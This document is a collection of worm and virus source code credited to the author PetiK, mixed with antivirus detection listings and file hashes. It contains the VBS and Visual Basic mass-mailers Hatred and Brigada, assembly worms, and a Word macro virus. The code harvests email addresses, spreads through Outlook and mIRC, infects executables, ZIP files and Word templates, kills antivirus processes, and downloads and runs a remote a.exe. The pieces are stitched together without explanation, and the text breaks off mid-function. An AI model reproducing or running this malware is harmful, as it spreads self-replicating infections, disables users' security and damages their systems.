GData 19 2009.05.16 Win32.Petik.J@mm
Ikarus T3.1.1.49.0 2009.05.16 Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 Worm.Win32.Petik.b
Kaspersky 7.0.0.125 2009.05.16 Worm.Win32.Petik.b
McAfee 5616 2009.05.15 W32/PetTick.aj
McAfee+Artemis 5616 2009.05.15 W32/PetTick.aj
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.B2
Microsoft 1.4602 2009.05.16 Worm:Win32/Dilna.A
NOD32 4080 2009.05.15 Win32/Petik.AD
Norman 6.01.05 2009.05.16 W32/Pet_Tick.Int
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.15 Worm Generic
PCTools 4.4.2.0 2009.05.15 Worm.Petik
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Win32.Petik.b
Sophos 4.41.0 2009.05.16 W32/Dilna-A
Sunbelt 3.2.1858.2 2009.05.16 Worm.Win32.Petik.b
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/Petik.b
TrendMicro 8.950.0.1092 2009.05.15 TROJ_DILNA.A
VBA32 3.12.10.5 2009.05.16 Worm.Win32.Petik.b
ViRobot 2009.5.15.1737 2009.05.15 Worm.Win32.Petik.5120
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Petdil.A
Additional information
File size: 5120 bytes
MD5...: e56a9313f5b25300de504cdce5c84bd8
SHA1..: 6901d7cc53cc5a3223fd9efe399082b119e80cf6
PEiD..: Crypto-Lock v2.02 (Eng) -> Ryan Thian
' Name : VBS.Hatred
' Author : PetiK
' Language : VBS
' Date : 29/06/2002
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
orig=WScript.ScriptFullName
fcopy=fso.GetSpecialFolder(0) & "\LoveVSHatred.vbs"
Call Copy(orig,fcopy)
If orig=fcopy Then
list(ws.SpecialFolders("MyDocuments"))
list(fso.GetSpecialFolder(0))
Do
Set out=CreateObject("Outlook.Application")
Set map=out.GetNameSpace("MAPI")
For each c In map.AddressLists
If c.AddressEntries.Count <> 0 Then
For d = 1 To c.AddressEntries.Count
Set wpalr = out.CreateItem(0)
wpalr.To = c.AddressEntries(d).Address
wpalr.Subject = "Love or Hatred"
wpalr.Body = "Open this file and choice..."
wpalr.Attachments.Add(WScript.ScriptFullName)
wpalr.DeleteAfterSubmit = True
If wpalr.To <> "" Then
wpalr.Send
End If
Next
End If
Next
Loop
End If
Sub Copy(src,dst)
fso.CopyFile orig,fcopy
ws.RegWrite "HKLM\Software\Microsoft\Windows\Currentversion\Run\LVSH",fcopy
End Sub
Sub list(dir)
For Each f1 In fso.GetFolder(dir).SubFolders
infect(f1.Path)
list(f1.Path)
Next
End Sub
Sub infect(dir)
For Each fil In fso.GetFolder(dir).Files
ext = fso.GetExtensionName(fil.Path)
ext = lCase(ext)
If (ext = "htm") or (ext = "html") Then
Set h=fso.OpenTextFile(fil.Path,1)
scnm=h.ReadAll
h.Close
For j = 1 To Len(scnm)
If Mid(scnm, j, 7) = "mailto:" Then
mlto = ""
cnt = 0
Do While Mid(scnm, j + 7 + cnt, 1) <> """"
mlto = mlto + Mid(scnm, j + 7 + cnt, 1)
cnt = cnt + 1
Loop
SendMail(mlto)
End If
Next
End If
Next
End Sub
Sub SendMail(email)
On Error Resume Next
Dim out
Set out = CreateObject("Outlook.Application")
Set mel = out.CreateItem(0)
mel.To = email
mel.Subject = "Love or Hatred ??"
mel.Body = "Open this attached file and you will know if you have the love or the hatred"
mel.Attachments.Add(WScript.ScriptFullName)
mel.Attachments.Add (WScript.ScriptFullName)
mel.Send
Set out = Nothing
End Sub
Encrypted version
Execute Q("4F6E204572726F7220526573756D65204E6...57874A456E6420537562")
Function Q(swpe)
For O=1 To Len(swpe) Step 2
Q=Q & Chr("&h" & Mid(swpe,O,2))
Next
End Function
Additional information
File size: 4043 bytes
MD5...: 0917a7ca2afb01dc26afc99f642c0b6f
SHA1..: aa809d611ba4ba26e9c4d65aeba3239888a0da79
' Name : W32.HLLW.Brigada
' Author : PetiK & alc0paul
' Language : Visual Basic
' Date : 02/07/2002
'
'
'
'
Attribute VB_Name = "Module1"
Option Explicit
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As
Any, ByVal ByteLen As Long)
Private Declare Function GetCommandLine Lib "kernel32" Alias "GetCommandLineA" () As Long
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long)
As Long
Private Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias
"SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long
Private Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" (ByVal hwndOwner As
Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long
Private Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As
Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName
As String, ByVal lpWindowName As String) As Long
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal
dwReserved As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal
bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long,
lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef lpdwFlags As
Long, ByVal dwReserved As Long) As Long
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const WM_CLOSE = &H10
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Const EWX_SHUTDOWN = 1
Const CSIDL_PERSONAL = &H5
Const CSIDL_STARTUP = &H7
Const CSIDL_TIF = &H20
Const CSIDL_WIN = &H24
Const CSIDL_WINSYS = &H25
Const MAX_PATH = 260
Private Type SHITEMID
cb As Long
abID As Byte
End Type
Private Type ITEMIDLIST
mkid As SHITEMID
End Type
Sub Main()
On Error Resume Next
Dim vdir As String
Dim lenhost As String
Dim vc As String
Dim mark As String
Dim hostlen As String
Dim virlen As String
Dim buffhostlen As String
Dim buffvirlen As String
Call regcall
Call killav
vdir = App.path
If Right(vdir, 1) <> "\" Then vdir = vdir & "\"
FileCopy vdir & App.EXEName & ".exe", GetSpecialfolder(CSIDL_WIN) & "\Ms0701i32.exe"
FileCopy vdir & App.EXEName & ".exe", GetSpecialfolder(CSIDL_WINSYS) & "\lolita.exe"
'--------------- check if virus or worm ------------------------
Open vdir & App.EXEName & ".exe" For Binary Access Read As #1
lenhost = (LOF(1))
vc = Space(lenhost)
Get #1, , vc
Close #1
mark = Right(vc, 2)
If mark <> "b8" Then
'worm
Call extrkzip
If InStr(1, GetCommLine, "-petikb8") = 0 Then
Else
Call wording
Call zipinfect
End If
If InStr(1, GetCommLine, "-alcopaulb8") = 0 Then
Else
Call virustime
End If
If InStr(1, GetCommLine, "-trojanmode") = 0 Then
Else
ShutdownWindows EWX_SHUTDOWN
End If
listht GetSpecialfolder(CSIDL_TIF)
Else
'virus : execute the host
Open vdir & App.EXEName & ".exe" For Binary Access Read As #4
hostlen = (LOF(4) - 75264)
virlen = (75264) 'worm/virus + zip component
buffhostlen = Space(hostlen)
buffvirlen = Space(virlen)
Get #4, , buffvirlen
Get #4, , buffhostlen
Close #4
Open vdir & "XxX.exe" For Binary Access Write As #3
Put #3, , buffhostlen
Close #3
'borrowed from murkry's vb5 virus
idProg = Shell(vdir & "XxX.exe", vbNormalFocus)
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess hProg, iExit
Loop
Kill vdir & "XxX.exe"
End If
'-------------------------------------------------------------------
Call downloader
End Sub
'---------------------- kill avs --------------------------------------
Sub killav()
On Error Resume Next
Dim avn, avn1, avn2, avn3, avn4, avn5, avn6, avn7, avn8, avn9, avn10, avn11, avn12
Dim aWindow As Long
Dim angReturnValue As Long
Dim num3, arrr3, av
avn = "Pop3trap"
avn1 = "JavaScan"
avn2 = "Modem Booster"
avn3 = "vettray"
avn4 = "Timer"
avn5 = "CD-Rom Monitor"
avn6 = "F-STOPW Version 5.06c"
avn7 = "PC-cillin 2000 : Virus Alert"
avn8 = "DAPDownloadManager"
avn9 = "Real-time Scan"
avn10 = "IOMON98"
avn11 = "AVP Monitor"
avn12 = "NAI_VS_STAT"
For num3 = 0 To 12
arrr3 = Array(avn, avn1, avn2, avn3, avn4, avn5, avn6, avn7, avn8, avn9, avn10, avn11,
avn12)
av = arrr3(num3)
aWindow = FindWindow(vbNullString, av)
angReturnValue = PostMessage(aWindow, WM_CLOSE, vbNull, vbNull)
Next num3
End Sub
'-------------------------- download update and run it ----------------------
Sub downloader()
On Error Resume Next
Dim databyte() As Byte
If InternetGetConnectedState(0&, 0&) = 0 Then GoTo xIt
Form1.Inet1.RequestTimeout = 40
databyte() = Form1.Inet1.OpenURL("http://p0th0le.tripod.com/a.exe", icByteArray)
Open "c:\update.exe" For Binary Access Write As #2
Put #2, , databyte()
Close #2
Shell "c:\update.exe", vbHide
xIt:
End Sub
'----------------------c:\WINDOWS file infection----------------
Sub virustime()
On Error Resume Next
Dim vdir As String
Dim sfile As String
Dim a As String
Dim arr1
Dim lenhost As String
Dim vc As String
Dim mark As String
Dim host
vdir = App.path
If Right(vdir, 1) <> "\" Then vdir = vdir & "\"
sfile = dir$(GetSpecialfolder(CSIDL_WIN) & "\*.exe")
While sfile <> ""
a = a & sfile & "/"
sfile = dir$
Wend
arr1 = Split(a, "/")
For Each host In arr1
Open GetSpecialfolder(CSIDL_WIN) & "\" & host For Binary Access Read As #1
lenhost = (LOF(1))
vc = Space(lenhost)
Get #1, , vc
Close #1
mark = Right(vc, 2)
If mark <> "b8" Then
GoTo notinfected
Else
GoTo gggoop
End If
notinfected:
infect (GetSpecialfolder(CSIDL_WIN) & "\" & host)
Exit For
gggoop:
Next host
End Sub
Function infect(hostpath As String)
On Error Resume Next
Dim ffile
Dim hostcode As String
Dim vir As String
Dim vircode As String
Dim header As String
Dim f As String
vir = App.path
If Right(vir, 1) <> "\" Then vir = vir & "\"
Open hostpath For Binary Access Read As #1
hostcode = Space(LOF(1))
Get #1, , hostcode
Close #1
Open vir & App.EXEName & ".exe" For Binary Access Read As #2
header = Space(LOF(2))
Get #2, , header
Close #2
f = "b8"
Open hostpath For Binary Access Write As #3
Put #3, , header
Put #3, , hostcode
Put #3, , f
Close #3
End Function
'--------------------zip infection-----------------------------
Sub zipinfect()
On Error Resume Next
list ("c:\")
End Sub
Sub list(dir)
On Error Resume Next
Dim fso, ssf, fil
Set fso = CreateObject("Scripting.FileSystemObject")
Set ssf = fso.GetFolder(dir).SubFolders
For Each fil In ssf
infection (fil.path)
list (fil.path)
Next
End Sub
Sub infection(dir)
Dim fso, cf, fil, ext
Set fso = CreateObject("Scripting.FileSystemObject")
Set cf = fso.GetFolder(dir).Files
For Each fil In cf
ext = fso.GetExtensionName(fil.path)
ext = LCase(ext)
If (ext = "zip") Then
Shell "c:\piss.exe " & fil.path & " " & GetSpecialfolder(CSIDL_WINSYS) & "\lolita.exe",
vbHide
End If
Next
End Sub
'--------------------trojan mode payload-----------------------------
Sub ShutdownWindows(ByVal intParamater As Integer)
Dim blnReturn As Boolean
blnReturn = ExitWindowsEx(intParamater, 0)
End Sub
'--------------------variable commandline-----------------------------
Sub regcall()
On Error Resume Next
Dim b As String, c As String, d As String, ws As Object
Dim regcol, final
Set ws = CreateObject("WScript.Shell")
b = "-alcopaulb8"
c = "-petikb8"
d = "-trojanmode"
regcol = Array(b, c, d)
Randomize
final = regcol(Int(Rnd * 3))
ws.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\b8",
GetSpecialfolder(CSIDL_WINSYS) & "\Ms0701i32.exe " & final
If dir("c:\regedit.exe") <> "regedit.exe" Then
FileCopy GetSpecialfolder(CSIDL_WIN) & "\regedit.exe", "c:\regedit.exe"
End If
End Sub
'--------------------extract zip software-----------------------------
Sub extrkzip()
On Error Resume Next
Dim vdir As String
Dim wormlen As String
Dim rarlen As String
Dim buffwormlen As String
Dim buffrarlen As String
vdir = App.path
If Right(vdir, 1) <> "\" Then vdir = vdir & "\"
Open vdir & App.EXEName & ".exe" For Binary Access Read As #1
wormlen = (LOF(1) - 63488)
rarlen = (63488)
buffwormlen = Space(wormlen)
buffrarlen = Space(rarlen)
Get #1, , buffwormlen
Get #1, , buffrarlen
Close #1
Open "c:\piss.exe" For Binary Access Write As #2
Put #2, , buffrarlen
Close #2
Shell "c:\piss.exe c:\brigada8.zip " & vdir & App.EXEName & ".exe", vbHide
End Sub
'--------------------e-mail collect and e-mailing-----------------------------
Sub listht(dir)
On Error Resume Next
Dim fso, ssfh, filh
Set fso = CreateObject("Scripting.FileSystemObject")
Set ssfh = fso.GetFolder(dir).SubFolders
For Each filh In ssfh
infht (filh.path)
listht (filh.path)
Next
End Sub
Sub infht(dir)
Dim mlto As String
Dim fso, cfh, filh, ext, textline, q
Dim j As Long, cnt As Long
Set fso = CreateObject("Scripting.FileSystemObject")
Set cfh = fso.GetFolder(dir).Files
For Each filh In cfh
ext = fso.GetExtensionName(filh.path)
ext = LCase(ext)
If (ext = "htm") Or (ext = "html") Then
Open filh.path For Input As #1
Do While Not EOF(1)
Line Input #1, textline
q = q & textline
Loop
Close #1
For j = 1 To Len(q)
If Mid(q, j, 7) = "mailto:" Then
mlto = ""
cnt = 0
Do While Mid(q, j + 7 + cnt, 1) <> """"
mlto = mlto + Mid(q, j + 7 + cnt, 1)
cnt = cnt + 1
Loop
Call Worming(mlto)
End If
Next
End If
Next
End Sub
Function Worming(mail As String)
On Error Resume Next
Dim a, b, c
Set a = CreateObject("Outlook.Application")
Set b = a.GetNameSpace("MAPI")
If a = "Outlook" Then
b.Logon "profile", "password"
Set c = a.CreateItem(0)
c.Recipients.Add mail
c.Subject = "check us out"
c.Body = "we exist to give everyone a smiley face... :)"
c.Attachments.Add "c:\brigada8.zip"
c.Send
c.DeleteAfterSubmit = True
b.Logoff
End If
End Function
'--------------------commandline parser-----------------------------
Private Function GetCommLine() As String
Dim RetStr As Long, SLen As Long
Dim Buffer As String
RetStr = GetCommandLine
SLen = lstrlen(RetStr)
If SLen > 0 Then
GetCommLine = Space$(SLen)
CopyMemory ByVal GetCommLine, ByVal RetStr, SLen
End If
End Function
'--------------------get special folder-----------------------------
Private Function GetSpecialfolder(CSIDL As Long) As String
Dim r As Long
Dim IDL As ITEMIDLIST
Dim path As String
r = SHGetSpecialFolderLocation(100, CSIDL, IDL)
If r = 0 Then
path$ = Space$(512)
r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal path$)
GetSpecialfolder = Left$(path, InStr(path, Chr$(0)) - 1)
Exit Function
End If
GetSpecialfolder = ""
End Function
'------------------ document infection ---------------------------
Sub wording()
On Error Resume Next
Dim vdir As String
vdir = App.path
If Right(vdir, 1) <> "\" Then vdir = vdir & "\"
FileCopy vdir & App.EXEName & ".exe", "c:\XXXview.exe"
Open "c:\v.r" For Output As #2
Print #2, "REGEDIT4"
Print #2, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"
Print #2, """Level""=dword:00000001"
Print #2, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"
Print #2, """Level""=dword:00000001"
Print #2, """AccessVBOM""=dword:00000001"
Close #2
Shell "c:\regedit.exe /s c:\v.r", vbHide
Kill "c:\v.r"
Open "c:\nl.tmp" For Output As #9
Print #9, "Sub document_close()"
Print #9, "On Error Resume Next"
Print #9, "Open ""c:\xp.exp"" For Output As 2"
Print #9, "Print #2, ""sub document_open()"""
Print #9, "Print #2, ""On Error Resume Next"""
Print #9, "Print #2, ""jbo = ActiveDocument.Shapes(1).OLEFormat.ClassType"""
Print #9, "Print #2, ""With ActiveDocument.Shapes(1).OLEFormat"""
Print #9, "Print #2, "" .ActivateAs ClassType:=jbo"""
Print #9, "Print #2, "" .Activate"""
Print #9, "Print #2, ""End With"""
Print #9, "Print #2, ""end sub"""
Print #9, "Close 2"
Print #9, "Set fso = CreateObject(""Scripting.FileSystemObject"")"
Print #9, "Set nt = ActiveDocument.VBProject.vbcomponents(1).codemodule"
Print #9, "Set iw = fso.OpenTextFile(""c:\xp.exp"", 1, True)"
Print #9, "nt.DeleteLines 1, nt.CountOfLines"
Print #9, "i = 1"
Print #9, "Do While iw.atendofstream <> True"
Print #9, "b = iw.readline"
Print #9, "nt.InsertLines i, b"
Print #9, "i = i + 1"
Print #9, "Loop"
Print #9, "ActiveDocument.Shapes.AddOLEObject _"
Print #9, "FileName:=""c:\XXXview.exe"", _"
Print #9, "LinkToFile:=False"
Print #9, "ActiveDocument.Save"
Print #9, "Open ""c:\b8.r"" For Output As #3"
Print #9, "Print #3, ""REGEDIT4"""
Print #9, "Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"""
Print #9, "Print #3, """"""Level""""=dword:00000001"""
Print #9, "Print #3,
""[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"""
Print #9, "Print #3, """"""Level""""=dword:00000001"""
Print #9, "Print #3, """"""AccessVBOM""""=dword:00000001"""
Print #9, "Close #3"
Print #9, "Shell ""c:\regedit.exe /s c:\b8.r"", vbHide"
Print #9, "Kill ""c:\b8.r"""
Print #9, "End Sub"
Close #9
Open GetSpecialfolder(CSIDL_STARTUP) & "\startup.vbs" For Output As #6
Print #6, "On Error Resume Next"
Print #6, "Set fso = CreateObject(""Scripting.FileSystemObject"")"
Print #6, "Set oword = CreateObject(""Word.Application"")"
Print #6, "oword.Visible = False"
Print #6, "Set nt = oword.NormalTemplate.vbproject.vbcomponents(1).codemodule"
Print #6, "Set iw = fso.OpenTextFile(""c:\nl.tmp"", 1, True)"
Print #6, "nt.DeleteLines 1, nt.CountOfLines"
Print #6, "i = 1"
Print #6, "Do While iw.atendofstream <> True"
Print #6, "b = iw.readline"
Print #6, "nt.InsertLines i, b"
Print #6, "i = i + 1"
Print #6, "Loop"
Print #6, "oword.NormalTemplate.Save"
Print #6, "oword.NormalTemplate.Close"
Print #6, "oword.quit"
Close #6
End Sub
File Brigada.exe received on 05.16.2009 11:20:53 (CET)
Additional information
File size: 75264 bytes
MD5...: 0a8cdb77f334f3f5d542509ed70ace70
SHA1..: 95e493da53b720985007df8f28817b94b7d9a902
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Dandelion
Author : PetiK
Date : November 7th
Size : 6144 byte
In each run, it copies itself with a randome name on %windows% path. It record
the name into the file "dandelion.txt" in the same folder.
#
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
start:
twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA ; esi = name of file
push 0
push edi
push esi
api CopyFileA ; copy itself
push 9
push edi
push 1
@pushsz "MS Explor"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA ; regedit
end_twin:
; call spread_computer
call htm_file
end_worm:
push 0
api ExitProcess
spread_computer proc
pushad
call generator_name
mov edi,offset genname
push 50
push offset windir
api GetWindowsDirectoryA
push offset windir
api SetCurrentDirectoryA
push 0
push edi
push offset orig_worm
api CopyFileA
@pushsz "dandelion.txt"
@pushsz "A New Copy Of Worm.Dandelion"
push edi
@pushsz "Copy Of Worm"
api WritePrivateProfileStringA
end_spread_computer:
popad
ret
generator_name:
mov edi,offset genname
api GetTickCount
push 9
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
gen_name:
push ecx
api GetTickCount
push 'Z'-'A'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'A'
stosb
api GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
api Sleep
pop ecx
loop gen_name
mov eax,'exe.'
stosd
ret
spread_computer endp
htm_file proc
pushad
mov edi,offset ptkdir
push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov eax,"glP\"
stosd
mov eax,"KTP_"
stosd
pop edi
push edi
api CreateDirectoryA
push edi
api SetCurrentDirectoryA
create_htm:
@pushsz "\WinPatch.htm"
push offset ptkdir
api lstrcat
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push offset ptkdir
api CreateFileA
mov [hHTM],eax
push 0
push offset byte
push e_htm - s_htm
push offset s_htm
push [hHTM]
api WriteFile
push [hHTM]
api CloseHandle
end_htm_file:
popad
ret
htm_file endp
.data
; === copy_worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
end start
end
'VBS.GoodBye Written in France.
'My last Worm. I say Good Bye
On Error Resume Next
dim w,f,win,sys,file
Set w=CreateObject("WScript.Shell")
Set fso=CreateObject("Scripting.FileSystemObject")
Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)
Set tmp=fso.GetSpecialFolder(2)
Set wo=fso.GetFile(WScript.ScriptFullName)
If wo <> (sys&"\Cmmon32.vbs") Then
MsgBox "Look at this new Game",vbinformation,"New Game For You"
img="4D5A50000200000004000F00FFFF0000.."
lire=decr(img)
Set pic=fso.CreateTextFile(win&"\New_Prog.exe",true)
pic.Write lire
pic.Close
'w.Run win&"\New_Prog.exe",1,false
MsgBox "Script : "&wo&vbCrLf&"Error : Cannot read this script"&vbCrLf&"Code :
800A000D",vbcritical,"Windows Script Host"
End If
wo.Copy(sys&"\Cmmon32.vbs")
wo.Copy(sys&"\Plg_PTK\Important.vbs")
run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS Cmmon32")
w.RegWrite run,("wscript "&sys&"\Cmmon32.vbs")
cache=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders\Cache")
desktop=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders\Desktop")
personal=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders\Personal")
progfile=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
commonfile=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\CommonFilesDir")
Mail(win)
Mail(sys)
Mail(tmp)
Mail(cache)
Mail(desktop)
Mail(personal)
Mail(progfile)
Mail(commonfile)
WormM ""
Function extension
text="ComExeBatDocXlsPptTifBmpJpgGifHtmHttMp3WavMid"
randomize (timer)
tfile=int(rnd(1)*14)+1
crext="."& mid(text,((tfile-1)*3)+1,3)
crext=crext&".vbs"
End Function
Function decr(octet)
For hexa=1 To Len(octet) Step 2
decr=decr & Chr("&h" & Mid(octet, hexa, 2))
Next
End Function
Function WormM(dir)
If Dir = "" Then
If fso.FileExists("C:\mirc\mirc.ini") then dir="C:\mirc
If fso.FileExists("C:\mirc32\mirc.ini") then dir="C:\mirc32
If fso.FileExists(pogfile&"\mirc\mirc.ini") then dir=pogfile&"\mirc\mirc.ini"
If fso.FileExists(pogfile&"\mirc32\mirc.ini") then dir=pogfile&"\mirc32\mirc.ini"
End If
If dir <> "" Then
Set mirc=fso.CreateTextFile(dir&"\script.ini", True)
mirc.WriteLine "[scipt]"
mirc.WriteLine "n0=ON 1:JOIN:#:{ ( $nick == $me ) { halt }"
mirc.WriteLine "n1 = /dcc send $nick " &sys&"\Plg_PTK\Important.vbs"
mirc.WriteLine "n2=}"
mirc.Close
End If
End Function
Function Mail(dossier)
If not fso.FileExists(sys&"\Plg_PTK\Info.txt") Then
Set DF=fso.CreateTextFile(sys&"\Plg_PTK\Info.txt")
DF.WriteLine "Files Found By VBS.GoodBye.Worm :"
DF.WriteBlankLines(1)
DF.Close
End If
If fso.FolderExists(dossier) Then
For Each File in fso.GetFolder(dossier).Files
ext=fso.GetExtensionName(File.Name)
If (ext="htm") or (ext="html") or (ext="php") or (ext="htt") Then
Set see = fso.OpenTextFile(File.path, 1)
liretout = see.ReadAll
For i = 1 to len(liretout)
mailto = mid(liretout,i,7)
If mailto = "mailto:" Then
msgbox mailto,vbinformation,File.path
Exit For
else
End If
Next
see.Close
Set DF = fso.OpenTextFile(sys&"\Plg_PTK\Info.txt", 8, True)
DF.WriteLine date& " " &time& " => " &File.path
DF.Close
End If
Next
End If
End Function
INFO.TXT
fs="FileSystemObject"
sc="Scripting"
wsc="WScript"
sh="Shell"
crlf=Chr(13)&Chr(10)
Set fso=CreateObject(sc & "." & fs)
Set ws=CreateObject(wsc & "." & sh)
Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)
Set tmp=fso.GetSpecialFolder(2)
desk=ws.SpecialFolders("Desktop")
strp=ws.SpecialFolders("StartUp")
Set fl=fso.OpenTextFile(WScript.ScriptFullName,1)
wrm=fl.ReadAll
fl.Close
End If
comment $
Name : I-Worm.Lauli
Author : PetiK
Date : 7th June 2002 -
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
st_worm:push 50
mov esi,offset org_wrm
push esi
push 0
api GetModuleFileNameA
;cop: push 0
; push edi
; push esi
; api CopyFileA
;reg: push 50
; push edi
; push 1
; @pushsz "Wsock32"
; @pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
; push 80000002h
; api SHSetValueA
push 0
push 80h
push 3
push 0
push 1
push 80000000h
@pushsz "code.txt" ;push offset org_wrm
inc eax
je end_cr_vbs
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
api CreateFileMappingA
test eax,eax
je end_vbs1
xchg eax,ebp
push 40h
@pushsz "OK"
@pushsz "OK"
push 0
api MessageBoxA
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_vbs2
push 0
push ebx
api GetFileSize
mov [size],eax
chk_byte:
mov edi,offset hex
push edi
p_c: lodsb
call convert
stosb
dec size
cmp size,0
jnz p_c
pop edi
push 40h
@pushsz "Hex String:"
push edi
push 0
api MessageBoxA
end_vbs3:
push esi
api UnmapViewOfFile
end_vbs2:
push ebp
api CloseHandle
end_vbs1:
push ebx
api CloseHandle
end_cr_vbs:
end_worm:
push 0
api ExitProcess
convert:
push ecx
push edi
xor ecx,ecx
mov cl,al
push ecx
shr cl,4
lea edi,hex_table
inc cl
@@y:
inc edi
dec cl
jnz @@y
dec edi
mov al, byte ptr [edi]
pop ecx
and cl,0Fh
lea edi,hex_table
inc cl
@@x:
inc edi
dec cl
jnz @@x
dec edi
mov ah,byte ptr [edi]
pop edi
pop ecx
ret
.data
cpy_wrm db 50 dup (0)
org_wrm db 50 dup (0)
size dd ?
hex_table db "012345789ABCDEF",0
end st_worm
end
Private Declare Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal
lpBuffer As String, nSize As Long) As Long
Sub AutoOpen()
Call FuckProtection
Call InfectWord
Call CreateEML
End Sub
Sub InfectWord()
On Error Resume Next
Set nor = NormalTemplate.VBProject.VBComponents
Set doc = ActiveDocument.VBProject.VBComponents
srcvir = "C:\calli.drv"
If nor.Item("Calli").Name <> "Calli" Then
doc("Calli").Export srcvir
nor.Import srcvir
End If
If doc.Item("Calli").Name <> "Calli" Then
nor("Calli").Export srcvir
doc.Import srcvir
ActiveDocument.Save
End If
Kill (srcvir)
End Sub
Sub FuckProtection()
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
Select Case Application.Version
Case "10.0"
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
Case "9.0"
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End Select
WordBasic.DisableAutoMacros 0
End Sub
Sub CreateEML()
bound = ""
For i = 1 To 17
Randomize (Timer)
bound = bound + Chr(Int(Rnd(1) * 8) + 48)
Next
eml1 = "To: """ & strUserName & "@microsoft.com""" & vbCrLf & _
"Subject: Hello You..." & vbCrLf & _
"Date: " & Hour(Now) & ":" & Minute(Now) & ":" & Second(Now) & " +0200" & vbCrLf
& _
"MIME-Version: 1.0" & vbCrLf & _
"Content-Type: multipart/mixed;" & vbCrLf & _
vbTab & "boundary = ""----=_NextPart_" & bound & """" & vbCrLf & _
"X-Priority: 3" & vbCrLf & _
"X -MSMail - Priority: Normal" & vbCrLf & _
"X-Unsent: 1" & vbCrLf & _
"X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000" & vbCrLf & vbCrLf & _
"This is a multi-part message in MIME format." & vbCrLf & vbCrLf
eml4 = EncodeBase64(ActiveDocument.FullName)
End Sub
Private Function EncodeBase64(ByVal vsFullPathname As String) As String
On Error Resume Next
Dim b As Integer
Dim Base64Tab As Variant
Dim bin(3) As Byte
Dim s As String
Dim l As Long
Dim i As Long
Dim FileIn As Long
Dim sResult As String
Dim n As Long
Base64Tab = Array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M",
"N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c", "d", "e",
